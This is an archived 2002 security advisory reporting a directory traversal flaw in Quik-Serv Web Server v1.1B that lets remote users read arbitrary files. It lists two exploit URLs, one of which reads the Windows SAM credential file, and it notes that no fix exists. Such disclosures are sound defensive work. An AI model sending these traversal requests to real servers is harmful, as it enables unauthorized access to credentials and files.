TUCoPS :: Web :: Servers :: web5242.htm

Quik-Serv Web Server arbitrary file disclosure
4th Apr 2002 [SBWID-5242]
COMMAND

	Quik-Serv Web Server arbitrary file disclosure

SYSTEMS AFFECTED

	Quik-Serv Web Server v1.1B

PROBLEM

	p0p     t4rtz     of      NetCra$h      Security      Research      Team
	[http://www26.brinkster.com/netcrash/] posted :
	

	The server is vulnerable to  a  directory  transversal  which  allows  a
	remote user to display arbitrary files.
	

	 Exploits :

	 ========

	

	http://server/../../../winnt/repair/sam

	http://server/../../../winnt/win.ini

	

	

	

	

SOLUTION

	None yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH